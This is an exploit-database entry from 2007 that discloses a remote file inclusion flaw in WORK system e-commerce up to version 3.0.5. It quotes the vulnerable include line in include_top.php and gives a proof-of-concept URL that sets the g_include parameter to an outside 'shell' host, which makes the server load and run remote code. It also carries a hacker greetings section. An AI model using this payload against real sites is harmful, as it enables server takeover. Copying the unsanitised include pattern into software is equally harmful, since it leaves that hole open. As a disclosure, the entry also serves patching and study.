WORK system e-commerce <= 3.0.5 Remote File Inclusion Vulnerability

2007-03-10T00:00:00
ID 1337DAY-ID-1567
Type zdt
Reporter Rodrigo Duarte
Modified 2007-03-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
WORK system e-commerce <= 3.0.5 Remote File Inclusion Vulnerability
===================================================================



#####################################################################################
Rodrigo Duarte

WORK system e-commerce:

WORK PHP,Mysql content management system CMS e-commerce or not : ajax, workflow,
content,package,language,currency,country,price,stock,group user,CSS,banner,logo,
link,partner,forum,new,FAQ,event,calendar,invoice,mailing,supplier,RSS, webservices.

Vulnerable Script:

~ include_top.php
(Other scripts of this project are also vulnerable with $g_include)

Vulnerable Code:

include ($g_include."include_logo.php");

PoC:

http://example/[WORK_system_path]/include/include_top.php?g_include=http://shell

d0rk:

[your_creativity_here]

greetz:

Cocada, FoNSECA, maxim noob
SHiKaA, ZeUsSixSixSix, Arthurcmc
pizzer, rmeira and darkers.com.br
and for all the rest, i miss.........

EOF:

BRAZILIAN RAQUER!
MAGIC PEOPLE, VOODOO PEOPLE!

#####################################################################################

defined('G_SESSION_OR_COOKIE') or header( "Location: index.php" );
if ( !isset($g_db_prefix) ) header( "Location: index.php" );

The above isn't the correct way to block inclusions.



#  0day.today [2018-01-10]  #